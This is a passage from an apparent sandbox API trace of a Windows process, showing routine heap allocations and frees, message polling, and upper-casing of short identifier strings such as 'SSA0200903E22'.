RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0196.604] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0196.604] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0196.604] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0196.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0196.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0196.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0196.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0196.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0196.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0196.604] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0196.605] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0196.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0196.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0196.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0196.605] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0196.605] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0196.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0196.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0196.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0196.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0196.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0196.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0196.605] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0196.605] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0196.605] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0196.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0196.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0196.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0196.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0196.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0196.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0196.605] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0196.606] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0196.606] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0196.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0196.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0196.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0196.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0196.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0196.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0196.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0196.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0196.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0196.606] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0196.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0196.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0196.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0196.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0196.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0196.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0196.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0196.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0196.606] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0196.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0196.607] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0196.607] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0196.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0196.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0196.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0196.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0196.607] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0196.607] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.607] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0196.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0196.607] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0196.607] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0196.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0196.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0196.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0196.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0196.608] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0196.608] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.608] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0196.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0196.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0196.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0196.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0196.608] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.608] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0196.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0196.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0196.608] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0196.608] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0196.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0196.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0196.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0196.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0196.609] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0196.609] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0196.609] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0196.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0196.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0196.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0196.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0196.609] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0196.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0196.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0196.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0196.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0196.609] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0196.609] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0196.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0196.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0196.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0196.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0196.610] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0196.610] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0196.610] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0196.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0196.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0196.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0196.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0196.610] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0196.610] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0196.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0196.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0196.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0196.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0196.610] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0196.610] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0196.610] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0196.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0196.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0196.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0196.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0196.611] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0196.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0196.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0196.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0196.611] CryptReleaseContext (hProv=0xad6480, dwFlags=0x0) returned 1 [0196.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0196.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0196.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0196.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0196.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0196.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0196.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0196.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0196.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0196.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0196.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0196.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0196.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0196.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0196.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0196.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0196.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0196.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0196.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0196.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0196.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0196.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0196.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0196.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0196.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0196.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0196.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0196.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0196.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0196.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0196.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0196.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0196.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0196.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0196.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0196.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0196.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0196.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0196.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0196.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0196.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0196.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0196.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0196.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0196.613] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0196.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0196.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0196.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0196.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0196.614] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0196.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0196.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0196.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f18 [0196.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0196.614] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0196.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0196.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0196.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0196.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0196.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0196.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0196.614] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0196.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0196.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0196.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0196.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 